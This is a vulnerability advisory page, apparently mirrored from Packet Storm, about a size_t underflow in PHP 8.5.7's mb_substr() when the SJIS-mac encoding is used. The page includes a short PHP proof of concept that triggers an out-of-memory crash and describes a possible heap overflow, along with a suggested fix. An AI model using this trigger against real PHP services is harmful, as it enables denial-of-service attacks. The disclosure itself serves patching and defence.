Lucene search
K

📄 PHP 8.5.7 mb_substr() Underflow

🗓️ 22 Jun 2026 00:00:00Reported by Khashayar FereidaniType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 34 Views

PHP 8.5.7 mb_substr SJIS-mac bypasses guard, causes size_t underflow to OOM heap overflow.

Code
# PHP 8.5.7 `mb_substr()` 'SJIS-mac' size_t underflow
    
    **Author:** Khashayar Fereidani
    **Disclosure Date:** 2026-06-18
    **Advisory:** https://fereidani.com/php-857-mbsubstr-sjis-mac-sizet-underflow
    **Contact:** https://fereidani.com/contact
    
    ## Description
    
    The `mb_get_substr()` function in `ext/mbstring/mbstring.c`
    deliberately skips an early empty return guard for the `SJIS-mac`
    encoding when `from >= in_len`. As a result, it falls through to
    `mb_get_substr_slow()`, executing `mb_convert_buf_init(&buf, MIN(len,
    in_len - from), ...);`. When `from > in_len`, the parameter `in_len -
    from` underflows the `size_t` representation, resulting in a vastly
    large allocation size (near ~2^64 bytes). This leads to an immediate
    Out-Of-Memory (OOM) fatal error. Furthermore, if
    `_ZSTR_STRUCT_SIZE(initsize)` wraps past `SIZE_MAX`, it could
    potentially allocate a tiny buffer while the structural limit retains
    the pseudo-wild value, resulting in a heap buffer overflow when
    subsequent codepoints are decoded and written.
    
    ## Proof of concept
    
    ```php
    <?php
    /*
     * PoC: mb_substr() 'SJIS-mac' size_t underflow
     * File:  ext/mbstring/mbstring.c  mb_get_substr() (~L2129) +
    mb_get_substr_slow() (~L2102) *
     * mb_get_substr() deliberately skips the early "return empty" guard
    for SJIS-mac:
     *
     *     if (len == 0 || (from >= in_len && enc != &mbfl_encoding_sjis_mac)) {
     *         return zend_empty_string;     // <-- sjis_mac bypasses this
    when from >= in_len
     *     }
     *
     * ... then falls through (sjis_mac is multibyte, not SBCS/WCS2/WCS4) to
     * mb_get_substr_slow(), whose first line is:
     *
     *     mb_convert_buf_init(&buf, MIN(len, in_len - from), ...);
     *
     * With `from > in_len` (bytes), `in_len - from` UNDERFLOWS size_t to ~2^64.
     * mb_convert_buf_init does emalloc(_ZSTR_STRUCT_SIZE(initsize)).
     *
     * Two outcomes, both wrong (correct result is the empty string):
     *  (A) `from` huge -> initsize ~2^64 -> fatal "Allowed memory size exhausted
     *      (tried to allocate 18446744073708551644 bytes)". CONFIRMED below.
     *  (B) `from` only slightly > in_len -> initsize sits just under 2^64 and
     *      _ZSTR_STRUCT_SIZE(initsize) WRAPS past SIZE_MAX to a tiny allocation,
     *      while buf->limit = out + initsize stays wild -> a subsequent write of
     *      decoded codepoints is a HEAP OVERFLOW. (Harder to trigger reliably:
     *      needs a SJIS-mac input decoding to more codepoints than bytes, i.e.
     *      from < codepoint_count while from > byte_count. Worth upstream review.)
     */
    echo "PHP ", PHP_VERSION, "  sjis_mac available: ",
         (in_array("SJIS-mac", mb_list_encodings()) ? "yes" : "no"), "\n\n";
    
    /* control: a normal encoding with from > strlen returns "" cleanly */
    echo "UTF-8, from=10 > strlen('abc'): -> "; var_dump(@mb_substr("abc",
    10, null, "UTF-8"));
    
    /* The bug: SJIS-mac, from >> strlen, length omitted -> underflow -> OOM fatal.
     * The "tried to allocate 18...644 bytes" is literally (size_t)(3 - 1000000). */
    echo "SJIS-mac, from=1000000 > strlen('abc'):\n";
    @mb_substr("abc", 1000000, null, "SJIS-mac");
    echo "(if you see this line, the fatal error above was caught/suppressed)\n";
    ```
    
    ## Impact
    
    An attacker could intentionally furnish conditions where `from >
    in_len` alongside the 'SJIS-mac' encoding, triggering a `size_t`
    underflow. This predictably causes a severe Out-Of-Memory (OOM) fatal
    error, culminating in a Denial of Service. Depending on environmental
    details, it might hypothetically cause a heap buffer overflow.
    
    ## Solution
    
    Adjust the constraints inside `mb_get_substr()` and
    `mb_get_substr_slow()` in `ext/mbstring/mbstring.c`. The calculation
    `in_len - from` should be adequately bounds-checked to halt
    computation or safely cap at zero when `from > in_len`, sidestepping
    the underflow when initializing string buffers.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Jun 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
34